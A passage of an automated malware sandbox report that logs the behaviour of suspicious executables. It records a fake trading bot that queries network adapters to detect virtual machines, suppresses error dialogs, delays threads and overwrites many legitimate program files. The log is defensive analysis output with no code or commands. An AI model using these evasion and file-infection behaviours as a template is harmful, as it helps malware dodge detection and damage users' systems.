                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 54C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D4C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2E70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2320000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 24E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 44E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 3170000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2D90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2370000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 21B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: B40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 26C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 1668Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 419Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4599
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 3068
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 6735
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 9377
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 410
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
